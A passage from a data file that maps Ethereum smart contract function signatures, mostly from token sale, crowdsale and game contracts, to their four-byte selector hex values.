"newSchellingRound(bool)": "0xfa1eae3c", "schelling(address)": "0x20c28b85", "fun1(uint256)": "0xacd9fd65", "BalanceClaim(address)": "0x2022936f", "claimBalance()": "0x30509bca", "FixedSupplyToken()": "0xa1183d50", "withdraw(uint32)": "0xaa9224cd", "setFee(uint32)": "0x1ab971ab", "setName(bytes32,address)": "0xf3305ae2", "example(uint256,address)": "0xc38789ba", "ThrowsInConstructor(bool)": "0xf3318fed", "finishVoting(address,uint256)": "0x3dfca2ad", "rejectProject(address)": "0x0ab7ec3a", "vote(address,bool)": "0xbd041c4d", "projectInfo(address)": "0xa3dd2b3e", "deployProject(uint256,string)": "0xb3aae830", "setDeploymentPriceYear(uint256)": "0xd4c46fa6", "OpenLongevity()": "0xd31feea1", "TokenMigration()": "0xbe60be76", "startTokensSale(address,uint256)": "0xb77d4876", "changeAddress(address,address)": "0xefe08a7d", "escapeHatch(bool)": "0xd668a461", "setEmployeeAddress(uint256,address,address)": "0x5a1e6fc6", "addEmployee(address,address,uint256,uint256)": "0x19feda7e", "decode(string,bytes32)": "0x030cecc7", "createPost(address,address,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32)": "0x568f910d", "addComment(address,address,bytes32,bytes32,bytes32)": "0x986f3c9b", "getHomePost(uint256)": "0x24968a70", "getUserByUsername(bytes32)": "0xfe2da970", "priceBox2()": "0x7e4929c4", "sellPaused()": "0xe1017332", "updateAndGetHodlTotalValue()": "0xe2c20836", "waitTokensPeriod()": "0xc38f1abf", "distributedAmount()": "0x0d25320c", "PreICOHardcap()": "0x234638df", "priceETH()": "0xc38ad273", "centsPerMonth()": "0x17e63b79", "getStats2()": "0x26baca1c", "getWithdrawalCounter()": "0x37ea1f63", "playersRequired()": "0x94ec3a0d", "TIER_4_BUYIN()": "0xdda81c15", "whitelister()": "0x22758a4a", "rebateTwoFenmu_()": "0x511bb41c", "tokenPrivateMax()": "0x7dc74473", "MAXIMUM_PERCENT()": "0xe11f6398", "rateETH_ROK()": "0x66d76bb2", "steps()": "0x60192799", "openingManualyMining()": "0x4a1311f9", "airDropHeight()": "0x6a871e27", "endPeriodA()": "0xb80546c2", "returnEtherToInvestors()": "0xc303c3d5", "currentIcoPhaseMinimum()": "0x5beb1d8f", "mustToSellCourses()": "0xf0c4fcc5", "poolCLock()": "0x69071418", "initialSale()": "0x7c320853", "purchaseGold()": "0x67a52fdb", "NextOwner()": "0x44673b2d", "changeStageTwo()": "0x83de6ed6", "FundAddress()": "0x7359f5cf", "MAX_NUM_OZT_TOKENS()": "0xfd5d173b", "MAXTOKENSOLD()": "0xea6b1377", "vpe_per_eos()": "0xb5b7d767", "deployStep()": "0x5836746d", "remainder()": "0xa0684251", "ETH_TOKEN_EXCHANGE_RATIO()": "0x281ae558", "sycCrowdsale()": "0x9558abde", "rakugoPresaleAddress()": "0xe24459ce", "totalBid()": "0x8a9e8671", "YourCustomToken()": "0x728ec9f1", "mintStart1()": "0xe62bd899", "ecoLock13()": "0xba0c1777", "crowdsaleUncappedTime()": "0x582b6fe4", "atto()": "0x24b94ac6", "week()": "0x4995b458", "isRentAuction()": "0xd381c67e", "tokenSupportLimit()": "0x25cbe702", "BASE_TIME_TO_COOK()": "0xc3492908", "plantationSize()": "0x05aebead", "buyerSymbol()": "0x0a3c000d", "stop_it()": "0x81b7c6e7", "allWon()": "0xf9e40a21", "date_ico_end()": "0x291948ff", "icoStartP3()": "0x88157942", "fstPrivateSalePortionDenominator()": "0x7826bbc3", "celebrityCount()": "0xf360e22f", "TOKENSALE_BLACKLIST()": "0xeb464316", "buyPrice_wie()": "0x9f0a11ee", "ICO_token_supplyCap()": "0x60aa0e1c", "zGetBothContractBalances()": "0x61931f39", "AUTHORSIGHASH()": "0xf4da6a54", "tokenLockoutPeriod()": "0x2ce04b20", "secondPresaleEnd()": "0xe3a97893", "currentProfit()": "0x8cead4bf", "collectedUSDWEI()": "0x366bc401", "saleEndTimestamp()": "0xc68deb7e", "secondStageTokensSold()": "0x9f923388", "isDisableEther()": "0xb30d1bb8", "minimumBetAmount()": "0x78e9f1ba", "bountyPoolAddress()": "0x34a042d8", "hardCapUSD()": "0xde81aaaa", "rateLastWeek()": "0xb65a1350", "configParams()": "0x88ec838f", "seventhTime()": "0x71ef7862", "circulatingTokens()": "0xab9d8b8b", "earlyInvestorsMintedTokens()": "0x4070372d", "presaleFinished()": "0x90b5e6d9", "killTokensForGPower()": "0x34746d86", "initialBalanceForMarketingCampaign()": "0xadbf54b7", "discountRateIco()": "0xdee555bf", "mHostFee()": "0xa5b589ce", "can_refund()": "0xb00e8668", "getPublicSaleTokensAvailable()": "0xba6bbe55", "TOKEN_FIRST_DISCOUNT_MULTIPLIER()": "0xda9b90c4", "badgeName()": "0x610c3009", "teamTotalSupply()": "0xc4834c30", "MINCAP_TOKENS_PRE_ICO()": "0xb89e066a", "offsetFeeRate()": "0x6bee9cfa", "freeToExtraMinting()": "0x56d0adac", "INITIAL_ENDTIME()": "0x312defb4", "buyshares()": "0x1317b559", "finalizeInit()": "0x72a02f1d", "totalSpins()": "0x901b2036", "FreezeTokensReleaseTime()": "0x7ebe7626", "feeMode()": "0xb188c70d", "retraitStandard_4()": "0xb47b2cfe", "intervalSecs()": "0x4cbf867d", "houseFeeThreshold()": "0x1e83ce17", "pauseRoundA()": "0x7e58f815", "totalTokensForSaleDuringICO3()": "0x6d6c2074", "transferlottery(address,uint256,bytes)": "0x1680f70d", "WCMY()": "0xe8d9d76a", "getFourthAddressBalance()": "0x48f3e6f4", "getThirdAddressBalance()": "0x4c75fbca", "getSecondAddressBalance()": "0x150727ff", "drawNow()": "0xeba60632", "setAuthorizedToDraw(address)": "0xa58daf76", "setFourthAddressBalance(address)": "0x1b55fe4e", "setThirdAddressBalance(address)": "0x4f6247f8", "setSecondAddressBalance(address)": "0xf463be37", "Crowdsale(address,uint256,uint256,address,address)": "0xb8905649", "MottoCoin()": "0x391d2eb4", "BitcoinTRONIX()": "0x7a654915", "TRIANGLE()": "0x639475ca", "TRIPToken()": "0x7e32baea", "setRedeemWallet(address)": "0xda42eea5", "setBlackFundsWallet(address)": "0xe0a21739", "transferBlackFunds(address)": "0xb52ae3fc", "checkIsKYC(address,address)": "0x06d6e513", "verifyAccount(address,bool)": "0xcf314b6a", "closeKYC()": "0x1bada3c0", "openKYC()": "0xce419871", "getWhiteListStatus(address,address)": "0x05c1f5ff", "getBlackListStatus(address,address)": "0xbc4447ef", "PSCToken()": "0xc746b299", "Try(string)": "0x3853682c", "setContact(string)": "0x8140d0dc", "GOLDENRATIO()": "0xdbc8817d", "EarthMedz()": "0x62f63c6e", "CentToken(uint256,string,uint8,string)": "0x654a1855", "HotManChain(uint256,string,uint8,string)": "0x65b37d70", "_generateInitialPattern()": "0xab7b47aa", "getAttr(bytes32,uint256)": "0xf1f05a3f", "getLastAttack(uint256)": "0xa12433fa", "getPath(uint256)": "0xe1765073", "getDna2(uint256)": "0xb11b40a1", "getDna1(uint256)": "0xa9b542bd", "getHp(uint256)": "0x8458bd70", "getByOwner(address)": "0x379c5131", "_create(address,uint8,uint8)": "0x24070feb", "setMaxCoordinate(uint256)": "0xd2bafbe6", "setMaxCoordinate(uint16)": "0xa1744812", "setNinjaKindCount(uint8)": "0xe7e31d52", "setName(uint256,bytes16)": "0x81b890fc", "lost(uint256)": "0x7cbc4eb6", "win(uint256)": "0x5bc60cfc", "setPath(uint256,uint256,bytes,bytes)": "0x89658163", "generateName(bytes16,uint256,uint256)": "0x206b64b4", "makeCall(address,bytes)": "0x1cb9ce63", "RLLToken(uint256,string,string,address)": "0xde2a4a43", "_buyTokens(address)": "0x1f5e881f", "buyTokens(address,string,string)": "0x3b932584", "getRank10()": "0x12529d22", "getRank09()": "0xf398faaa", "getRank08()": "0xea7f9244", "getRank07()": "0x3925ad8a", "getRank06()": "0x68412058", "getRank05()": "0xf30c0ee6", "getRank04()": "0xb587e3c7", "getRank03()": "0x998eb4cf", "getRank02()": "0x57ba8652", "getRank01()": "0xb068b5b8", "getWinnerWithRank(uint8)": "0x744927fd", "setWinner(string,uint8)": "0x87a07692", "DHUB()": "0x085554a4", "transferDoc(uint256,address,address)": "0xf6310813", "transferAll(address,address)": "0x4b14e003", "getCertificationDocument(address,uint256)": "0x48f1e9c2", "getCertifiedDocCount(address)": "0x237082bd", "validateTranscriptHash(address,uint256,bytes32)": "0x6fa6c360", "validateContentHash(address,uint256,bytes32)": "0x67c281a9", "validateIpfsDoc(address,uint256,bytes)": "0xacc32da3", "validate(address,uint256,bytes32,bytes,bytes32)": "0xa4e339c1", "addCertification(address,bytes32,bytes,bytes32)": "0xe2ad0699", "BGS()": "0x9492fbf7", "cancelOrder(address,address[5],uint256[8],bytes32,uint8,bytes32,bytes32)": "0x31b2d49c", "takeOrder(address,address[5],uint256[8],bytes32,uint8,bytes32,bytes32)": "0xf97f8e17", "makeOrder(address,address[5],uint256[8],bytes32,uint8,bytes32,bytes32)": "0x570bc25f", "KUISToken()": "0x593a5bff", "PintOd()": "0x3b25cf37", "IotWifitoken()": "0xee0b0eb0", "getKtcAddress()": "0x156bf4c1", "setKtcAddress(address)": "0x7ff988c5", "WithdrawFromKickTheCoin()": "0x7c853cc1", "processKick()": "0x67899248", "setShares()": "0xc68a3c1e", "storeWinnerShare()": "0x04ee9748", "initGame()": "0x32eb2564", "sunrise()": "0xfc06d2a6", "getSundownGraceTargetBlock()": "0x71c8e333", "gameIsSundown()": "0xca093888", "sundown()": "0x16fef995", "changeGameParameters(uint256,uint256)": "0x64d6a95f", "changeAirDroper(address)": "0x3e214e96", "getGameIndex()": "0x44a3bb82", "getCostToKick()": "0xa1c4774b", "getNumberOfBlocksPerKick()": "0xf759e298", "getBlocksLeftInCurrentKick()": "0x7329036a", "getTargetBlockNumber()": "0x20f3d413", "airDrop(address)": "0xcd18d5a4", "decentralizedEconomy()": "0x064f5dcd", "releasedAmount()": "0x45d30a17", "tokenRate10()": "0x0827ab43", "checkUniqueLockedTokenReceivers()": "0xab736b5d", "withdrawPreIcoFounds()": "0xf21baec7", "lastaction()": "0x99967819", "ipfs()": "0xd7959cf9", "chunk5IsAdded()": "0xf0ccc21a", "backend()": "0x099e4133", "luckySevenBets()": "0xfda03476", "releaseTokenCornerstone()": "0x7b7d4655", "setNewApproves()": "0x94fa5bcd", "documentsCount()": "0x95e52d98", "totalSupplyWithoutDecimals()": "0x55674064", "thisAddr()": "0xd9ef58a5", "developerFund()": "0x91b23419", "totalSupplyOnIco()": "0xc1165781", "roundTwoLimit()": "0x2f76c31d", "updateTimestamp()": "0x1c5be3d7", "getPastGamesLength()": "0xe4bf56b8", "TOTAL()": "0x27efc086", "team_total_lock_days()": "0x6274a35c", "endStage3()": "0x1a5b72c3", "targetContract()": "0xbd90df70", "bountyManager()": "0xb36b9ffd", "tokensSupplied()": "0x55c8c6fd", "hourlyRate()": "0x59a7b3fe", "isMinCapReached()": "0xc94b56e3", "stopTokenSwap()": "0x3c1cc14e", "generatePresaleHouses()": "0x7bf21aa4", "Sales()": "0xd70d9604", "minAcceptedEthAmount()": "0xf1ae72a5", "goldTotalSupply()": "0x42616d21", "communityVesting4Years()": "0xf57688b6", "period2End()": "0x11844aae", "payoutNow()": "0xacc2508b", "Winning_Entry()": "0xc6d456ec", "rewardManager()": "0x0f4ef8a6", "messageNumber()": "0x048b3918", "REFERRAL_TOKENS()": "0xbd4e0b4d", "notapproved()": "0x9ca67a6e", "emissionRate()": "0x96afc450", "TOKEN_RATE()": "0x4174f1a5", "currentFundrise()": "0xb8cf2515", "blockingDuration()": "0xea8eb4be", "startIcoTwo()": "0x3dbae9f9", "minRandomPrivilegeValue()": "0x6a011ae5", "HOST_CUT()": "0xae6a2435", "ethartArtReward()": "0x63263858", "EmergencyPause()": "0x3e57324e", "tokensWallet()": "0x02d8146e", "bountyOnlineTokens()": "0xf4db9ad1", "numberEthUpdates()": "0x9916c350", "lastAction()": "0x89f71d53", "secondsLive()": "0x2ed604c8", "PRE_SALE_3000_ETH()": "0x45d1b657", "bonusedPurchases()": "0xd1fccf9e", "maxbuyinQuantity()": "0x330d57f9", "AgriChainLabelInt()": "0xe1fa78e9", "getCreatorAddress()": "0x94d2d7a7", "AngelInvestmentAddr()": "0x6200979e", "totalPetCardSeries()": "0xa50395cf", "getC()": "0xa2375d1e", "withdrawalAddressFixed()": "0x76e57d4b", "baseTargetInWei()": "0x45a45695", "totalUnrestrictedAssignments()": "0x182e0c49", "PRE_ICO_MAX_TOKENS()": "0x1d65d60e", "ethAddr()": "0xbbf646c2", "availSupply()": "0x9f5215dd", "buyIntoSyndicate()": "0x165f7d38", "RAVI_ADDRESS()": "0xecb6b50c", "privateEventTokens()": "0x635eecea", "currNumOfCards()": "0xf5610668", "payoutCursor_Id()": "0x9e9785ad", "lastBlock_v10()": "0xd50f7c73", "HawalaKickoffTime()": "0xe731b034", "isPreICOPublicOpened()": "0x0bce62ea", "etsContract()": "0x54c86628", "tokenUnsold()": "0x6f5b286d", "ART_DECIMALSFACTOR()": "0x0399f881", "seatPrice()": "0x0fd57f3e", "multiple()": "0x437a8ae6", "angelMaxAmount()": "0x3c647fbd", "rolloverPercent()": "0x81a46662", "paidOut()": "0x5c76ca2d", "whitelistBonusAmount()": "0x56a765c4", "OfferTime()": "0x4a96d129", "m_tokenPrice()": "0x3924b718", "unpause2()": "0x0f5f4c53", "releaseLockToken()": "0x3b4700fa", "COLOR_GOLD()": "0xfc4d705b", "randao()": "0x56e83e81", "totalPoolCap()": "0xde91af7b", "PCDStartTime()": "0x456176eb", "resultsDelay()": "0x65a4c957", "sendTokensToBuyers()": "0x8e165058", "minAcceptedETH()": "0x5d63b758", "superAdmin()": "0x29575f6a", "contributionsAddress()": "0x5c10b2e8", "start6Phase2025()": "0xff56b59a", "forked()": "0x16c72721", "ForkChecker(uint256,bytes32)": "0x11b9fee8", "ForceSendHelper(address)": "0x93feb13b", "forceDivestOfOneInvestor(address)": "0x51404cbe", "forceDivestOfAllInvestors()": "0x232523e8", "forceDivestAll(bool)": "0x29e206bd", "forceDivestAll()": "0x7cf0ffcb", "follow(uint256)": "0x384b1393", "followCampaign(uint256)": "0x6a5da6e5", "Fokitol()": "0x446a7974", "flush()": "0x6b9f96ea", "flipTheCoinAndWin()": "0x3369dace", "fixBalanceInternal(address)": "0xf1c760ae", "fixBalance()": "0x912de8de", "fivetimes()": "0xe87df70e", "first()": "0x3df4ddf4", "FirstBloodToken(address,address,uint256,uint256)": "0x9e9d3aa4", "fipsTransferMulti(bytes20[],address)": "0x42402c2c", "fipsTransfer(bytes20,address)": "0x2fa00e58", "fipsRegister(uint256,bytes)": "0xc12af1ce", "fipsRegister(uint256,address,bytes)": "0x2f62a6ff", "fipsRegister(uint256)": "0x3dc02266", "fipsRegisterMulti(uint256,address,bytes)": "0x1531c267", "fipsRegister(address,bytes)": "0xb16562fe", "fipsRegister(address)": "0x419ffa03", "fipsRegister()": "0x74d4ab27", "fipsPublishDataMulti(bytes20[],bytes)": "0xfba06849", "fipsPublishData(bytes20,bytes)": "0x3df76482", "fipsOwner(bytes20)": "0x5084da18", "fipsNotaryLegacy68b4()": "0x7620f4bb", "FipsNotary()": "0x3def449b", "fipsLegacyRegisterMulti(bytes20[],address,bytes)": "0x5cb18a6d", "fipsLegacyRegister(bytes20,address,bytes)": "0xdfce8ac3", "fipsLegacyRegister(bytes20[],address)": "0x3ae7cdfa", "fipsIsRegistered(bytes20)": "0x7910085d", "fipsGenerate()": "0x1dcb304b", "fipsChangeOwner(bytes20,address,address)": "0xa289673b", "fipsAddToLedger(bytes20,address,bytes)": "0xaa8dea8c", "fipsAddToLedger(bytes20,address)": "0x113e6b66", "_finishNoCallback()": "0x2cce4abe", "fines()": "0xc9bd2893", "find()": "0x70d53be5", "findPtr(uint256,uint256,uint256,uint256)": "0x5fa513d5", "fillUpSlot(uint256,uint256)": "0xbf12165e", "fillUpProject(uint256,uint256)": "0x7ff729fc", "fill(uint256[])": "0x884b5dc2", "fillGas()": "0x75438e49", "fifty_fifty()": "0x5b151fd2", "Fees(uint256)": "0x6860fd58", "feeFor(address,address,uint256)": "0xc5096a69", "FastRealisticPyramid()": "0xd3732642", "FallenLeaders()": "0x93e02d13", "fallbackRP()": "0xa5e62f02", "fairandeasy()": "0xc57a050e", "failSend()": "0xb764e273", "extractNameFromData(bytes)": "0x981a60f5", "extractMasterKeyIndexLength()": "0x2885b593", "extractImportFeeChargeLength()": "0xd1da09ee", "extractFrozenAccountLength()": "0xb5a6c525", "extractFeeLength()": "0xa056469a", "extractExportFeeChargeLength()": "0x1cf43b63", "extractBalanceOfLength()": "0xc8117b5b", "extractAllowanceRecordLength(address)": "0x8f731077", "extractAllowanceLength()": "0x727089f1", "extractAccountLength()": "0x4de162e4", "extractAccountAllowanceRecordLength(address)": "0x7ef95c6f", "ExtraBalToken()": "0xe2056c46", "externalLeave()": "0xf55b23c0", "externalEnter()": "0x6a6d31db", "extend(bytes16[],uint64)": "0x37930615", "ExpiringMarket(uint256)": "0x419945f8", "expire(uint256,uint256,uint8,bytes32,bytes32,bytes32)": "0x03cf4fd6", "expire(uint256,uint8,bytes32,bytes32,bytes32)": "0xd4649fde", "execWithGasLimit(bytes32,bytes32,uint256,uint256)": "0x3462f32d", "executeSpendingRequests()": "0x140b4465", "executeSellOrder()": "0x4d782cbc", "executeSellOrder(address)": "0x38557648", "executeEmergencyWithdrawal()": "0xf4993bbd", "exec(bytes32,bytes32,uint256)": "0x9f87acd0", "euroteambet()": "0xd5171523", "EthVentures4()": "0x9c172f87", "EthVentures3()": "0x4054f5de", "EthVenturePlugin()": "0x6f13e01b", "Ethstick()": "0x3023d0c4", "EthOne()": "0xf5f6ea26", "EthFactory()": "0x0da3e613", "EtherTransfer()": "0x356594ab", "EtherTopDog()": "0xadd43c59", "Etheropt(uint256,string,uint256,uint256,bytes32,address,int256[])": "0xa08d3f83", "Etheroll()": "0x1558ae4d", "EtherLovers()": "0xf9a794ad", "EtherizationUtils2()": "0xff7f5f2a", "EtherizationUtils()": "0xd409ddda", "Etherization()": "0x50e06b57", "EtherId()": "0xd81f53fd", "EthereumRoulette()": "0x29bed3bf", "etherandomVerify(bytes32,bytes32,bytes32,uint256,uint256)": "0x7ca55e00", "etherandomSetNetwork()": "0x4d561721", "etherandomSeedWithGasLimit(uint256)": "0x70e71ea3", "etherandomSeed()": "0x36f9f49c", "CEO_Signature()": "0xdf2df29a", "JP_sum()": "0xf889ac54", "rateOfEmissionPerYear()": "0xe8a9594f", "dateRelease9()": "0xabe756da", "days_interval()": "0x3528c022", "eolBlockNumber()": "0xfec74d31", "MAXUM_SUPPLY()": "0xc8922057", "checkVotingForStartPayment()": "0xdd515cdb", "userCount_()": "0x04ebfc52", "CXLExchangeRate()": "0x2494e267", "morties_TO_HATCH_1RickAndMorty()": "0x62fb0ff8", "numberOfBet()": "0xe06868e2", "waitTime()": "0xccca123b", "forceEndCall()": "0x9457c68a", "initialBalance()": "0x18369a2a", "totalsigs()": "0xd6039a41", "partner1_name()": "0xf41d1a82", "TOKEN_HODL_6M()": "0x04c80c3c", "gemmyMusicLockTime()": "0x0005bfb7", "withdrawRune()": "0xcbf66a02", "distributeAmount()": "0x4f25eced", "tokenInitialized()": "0x579140f4", "isDistributionTransferred()": "0x365fe9fd", "maximumTokensForFirst()": "0x6bd7eeeb", "whitelist_enabled()": "0x8a8b7e02", "potSplit_()": "0x58d162da", "switchONfreeForAll()": "0x5f421776", "userManagerContract()": "0xbc802c83", "openSaleCompleted()": "0xbcbfe43c", "totalEthCollected()": "0xce2a9f62", "angelsDayCooldownEnd()": "0xb41d989d", "mininumContributeUSD()": "0x26b85f0d", "OWNERS_AUCTION_CUT()": "0x743bd681", "icoManager()": "0x319df3bf", "nextroundsolsforhire()": "0x4c31df50", "KIND()": "0xc872da3c", "MAX_TOKEN_CAP()": "0x7fe864b8", "minEthValue()": "0x5bf4063d", "sessionId()": "0x9648c9f4", "STAGE2_TIME_END()": "0x6530e008", "lastFinish()": "0xf2766051", "init3_block_height()": "0x7e1db516", "currentBetAmount()": "0xb18a78e3", "securityTokensPercent()": "0x6b6292d9", "PreIcoMessage()": "0xa99be610", "lastPlayTime()": "0xbbce67ca", "zeroBonus()": "0x24fd6ec9", "getCurrentMilestonePostponingProposalDuration()": "0x3ac256d8", "getAgreementSetCount()": "0x22b6fe9e", "allowTransferToken()": "0xef6a676d", "atxContract()": "0xb8c963a6", "saleCounter()": "0x0387b0a2", "RESERVES_HOLDER()": "0xbaaf4eef", "getLastCategory()": "0x8269df9b", "swapper()": "0x2b3297f9", "tgeActive()": "0x385cd083", "tokenTransfersFrozen()": "0x7b9dc066", "sunFinished()": "0x85ae2f1c", "verify_withdraw()": "0x6127cfd9", "tokenTeam()": "0x228acf2f", "first_player()": "0x51ec4525", "transferReserveToMain()": "0x29108d1b", "bgb_per_Keos()": "0xc98b7027", "publicLockEnd()": "0xf8d3e256", "tokenSaleContract()": "0x5d5aa277", "RANGESTART_9()": "0x5abacc89", "auctionSumGwei()": "0xa71b4c26", "allocatedTokens()": "0x002f9569", "uniq(uint8[])": "0x0fd0e440", "PRESALE_PERIOD()": "0x9a0d4f40", "feeReceiverContract()": "0xb453fb01", "mPerSellData()": "0x15fdf660", "VUP_TOKEN_SUPPLY_TIER1()": "0xc742bab1", "m_ETHPriceInCents()": "0xebad6612", "ALLOC_FOUNDER()": "0x5837bb11", "finalizeSet()": "0xb12f9eab", "preIcoTokensCount()": "0xf8f2d5e4", "_isBuying()": "0xd2760b64", "SUBSCRIPTION_MODULE()": "0x35b55d98", "soldTokensSale()": "0xc6178a65", "getContractOwnerAddress()": "0xe0e7127a", "currentEthPrice()": "0x1cd732c1", "AMOUNT()": "0xd1789176", "NEXT_POT_FRAC_BOT()": "0x0a681f7f", "PERC_TOKENS_TO_DEV()": "0xbeca40df", "isInTestMode()": "0xb656e9f4", "persians()": "0x8e821b24", "vipRate()": "0xbe83ff83", "hasCrowdsaleStarted()": "0x153cc53d", "stand()": "0xc2897b10", "solvency()": "0x773c5049", "issuedToDate()": "0xcf195e34", "sayGoodBye()": "0x24b3940a", "maxAttendees()": "0x5f3d7fa1", "DELEGATION_HASH_EIP712()": "0x30ca0a53", "service_founder()": "0x864c2e94", "preIcoToken()": "0x636fa3c6", "buySWL()": "0x31014853", "saleStartBlock()": "0x20027275", "buySupply()": "0xb51dfa9d", "earlyResolve(bytes32,uint256,bytes32,bytes)": "0x2d9029ca", "reclaimExpiredSwaps(bytes32,bytes32)": "0x909c9fca", "batchReclaimExpiredSwaps(bytes32,bytes32[])": "0xd79c1f7f", "regularTransfer(bytes32,bytes32)": "0x0c4f8f6f", "batchRegularTransfer(bytes32[],bytes32[])": "0x6280b0bb", "convertIntoHtlc(bytes32,address,uint256,uint256,uint256,bytes32)": "0x4f55f292", "reparametrizeMultisig(bytes32,uint256)": "0x48e7a100", "initialiseMultisig(address,uint256)": "0xe56c8155", "spendFromSwap(bytes32,uint256,address)": "0x4027d4d8", "spendFromMultisig(bytes32,uint256,address)": "0xe3530e9c", "PureChainToken()": "0x643c6d1f", "changePriceUSD(uint256)": "0x867f990a", "PreICO(uint256,uint256,address,address,uint256)": "0xe416d173", "InternationalRapidAsset()": "0x0212fd1f", "multiPartyTransferFrom(address,address[],uint256[])": "0x6e96433f", "multiPartyTransfer(address[],uint256[])": "0xb22c14c7", "Usdcoins()": "0x9205dce7", "EndoSHARD()": "0xf294aa26", "create(uint256,string)": "0x0118fa49", "lengthOfRecord(uint256)": "0x0cf820e0", "DPOS()": "0x6943935e", "_isSignedPrefixed(address,address,bytes32,uint8,bytes32,bytes32)": "0x715b99f8", "_isSigned(address,address,bytes32,uint8,bytes32,bytes32)": "0x6613ee9c", "getUserByAddress(address,address)": "0x0466450e", "setMinimumHydroStakes(uint256,uint256)": "0x85ba9a99", "setHydroTokenAddress(address)": "0xbed7437f", "deleteUser()": "0x026ff05e", "signUpUser(string)": "0x45004310", "signUpDelegatedUser(string,address,uint8,bytes32,bytes32)": "0x2e5df0fe", "RiseCoinToken()": "0x680bd2f4", "NTC()": "0xfc749323", "TCNYCoin()": "0xf8d506e1", "CNYB()": "0x5d3afb19", "release_all()": "0x83999223", "get_time_locked_contract(uint256)": "0x1de4334a", "buyoutAndSetReferrer(uint256,bool,uint256,uint256,address)": "0x75c14f7d", "buyout(uint256,bool,uint256,uint256)": "0x893fb18e", "BurnupGameCore(address)": "0xf2965a2c", "nextBuyoutPrice(uint256)": "0x5678524f", "_claimedSurroundingTiles(uint256)": "0xa1d86608", "BurnupGameFinance(address)": "0x556e56d1", "setBeneficiary2(address)": "0x7d1ca9fd", "setBeneficiary1(address)": "0x2f2b348d", "payBeneficiaries()": "0xeb42b0cb", "BurnupHoldingCore(address,address)": "0x221538f4", "_setReferrer(address,address)": "0x94272356", "referrerOf(address)": "0xd21cacdf", "removeBurnupGame(address)": "0xf548a578", "addBurnupGame(address)": "0xaf375838", "BurnupHoldingAccessControl()": "0xf153d3ad", "setNextGameSettings(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xdac34674", "identifierToCoordinate(uint256)": "0x6d6bc5f5", "coordinateToIdentifier(uint256,uint256)": "0x258a61d6", "validCoordinate(uint256,uint256)": "0xa6da54a3", "BurnupGameBase()": "0x0ccc88b1", "BurnupGameAccessControl()": "0x13a24744", "TokenEBU(uint256,string,string)": "0xef406d01", "NokuMasterToken(uint256,uint256)": "0x1f13b5ae", "mintVested(address,uint256,uint256,uint256)": "0x39e613d9", "AdaptableToken(uint256,uint256)": "0x27816932", "callTokenFallback(address,address,uint256,bytes)": "0x509c90b3", "internalBurn(address,uint256)": "0x3a323bdf", "setTokenSaleFinished()": "0xe6197f41", "setTokenSale(address,address,uint256)": "0x9118575a", "HelloToken(uint256,string,uint8,string)": "0xad23e038", "EREEBERRY()": "0x32b45055", "FRPoint()": "0x8fc5fd83", "_getTokenAmountWithReferal(uint256,uint8)": "0xe14e1ba7", "_getTokenAmountWithBonus(uint256)": "0x64eded20", "_preValidateICOPurchase(address,uint256)": "0x54eb9e88", "_preValidatePreICOPurchase(address,uint256)": "0x0e713a50", "_isICO()": "0x0c326330", "_isPreICO()": "0xe168ae8a", "hasICOClosed()": "0x53c3fe8a", "hasPreICOClosed()": "0x718dfb7e", "buyTokensWithReferal(address)": "0x4db3c6d7", "setETHUSD(uint256)": "0xe230dfbd", "setICOEndDate(uint256)": "0x43e91384", "setICOStartDate(uint256)": "0xb3335e6b", "setPreICOEndDate(uint256)": "0x0085c647", "setPreICOStartDate(uint256)": "0xc9db1bbf", "setRate(uint16)": "0xbed315f8", "Crowdsale(address,uint256,uint256,uint256,uint256,uint256)": "0xf3a8041f", "betD()": "0x243d51b4", "betB()": "0x6a822760", "betA()": "0x076c52b2", "status(address)": "0x645b8b1b", "winnerIsDraw()": "0x93fc2c8b", "winnerIsB()": "0x015afa55", "winnerIsA()": "0x6bf9e633", "getInfoD(uint256)": "0x7630ad34", "getInfoB(uint256)": "0x1827caf4", "getInfoA(uint256)": "0x2a6dd9cb", "BankhadCoin()": "0x7cfe7a25", "cardSupply()": "0x7c97479b", "cardsOfOwner(address)": "0x3d8807f8", "buyBoosterPack()": "0xa3006abf", "getCard(uint256)": "0x9188d312", "changeCardCost(uint256)": "0x20e07e7f", "CorsariumCore(address[],uint256[])": "0xbaa416b6", "isWalletLocked_Receive(address)": "0x788c4023", "isWalletLocked_Send(address)": "0xf1f62f10", "walletUnlock(address)": "0xaf87c366", "walletLockBothForever(address)": "0x2823fbe5", "walletLockBoth(address,uint256)": "0x03a1bdc3", "walletLock(address,uint256,bool,bool)": "0x74ccd7cc", "ApisToken()": "0x7fcfc4a0", "darx()": "0x119eeb9c", "activateWhitelist()": "0x89e877a3", "redistribution()": "0xe37b346d", "BluToken()": "0x5e2cb4f1", "currentTierDiscountPercentage()": "0xf008be46", "BBTCToken()": "0xeec69548", "setAirdropAddress(address)": "0xab0eda9e", "PreHELIX()": "0xc0c8ccb3", "HoneySuckleTimes()": "0x2a555650", "YouAreRichToken()": "0x30228a12", "Edujano(uint256,string,uint8,string)": "0x62b4faa7", "PonderGoldToken()": "0x7375c0c3", "sender()": "0x67e404ce", "BelottoCoin(address)": "0xeaa2f447", "NEWSOKUCOIN()": "0x1402c310", "SpermLab()": "0x368a5773", "BOWTERC20()": "0x222a5343", "Seiyuu()": "0x9f233c76", "WillyCoin()": "0xafa17725", "SLPC_ERC20Token()": "0xb5e59318", "WeTestToken(address,string,string,uint256,uint256)": "0x026d19d5", "WABnetwork(uint256,string,string)": "0x84cfc5aa", "NickoinToken()": "0x3120cefa", "TwoAfrica(uint256,string,string)": "0x51172285", "checkCap()": "0xc13982ee", "determineCurrentStage()": "0x9fcf11bb", "MplusCrowdsaleB(address,address)": "0x6676aaa2", "BCIA()": "0xb0e4925c", "UseQuantity(int32)": "0xf3ff10bf", "InitQuantity(int32,string)": "0xb447cfd4", "setCurrentRevision(address)": "0x736c983a", "setDocumentData(string,string,string,string,string)": "0x60f2b9af", "AgriChainDocumentContract()": "0x0e978e81", "setDataInt(string,string)": "0x6ada94e0", "setData(string,string)": "0x8ca3c553", "setNotes(string)": "0x3a77c91a", "setAgriChainSeal(string)": "0xe9a3f454", "setAgriChainData(address)": "0x68a7d7ea", "setProduct(string)": "0x572d5298", "setOrganization(string)": "0x319c33cc", "AgriChainProductionContract()": "0x7b6c4dc7", "setAgriChainContext(address)": "0x225cf990", "setAgriChainDocuments(address)": "0x6b550dd3", "setAgriChainDistribution(address)": "0xd3b5305c", "setAgriChainCultivation(address)": "0x9976f9e1", "setAgriChainProduction(address)": 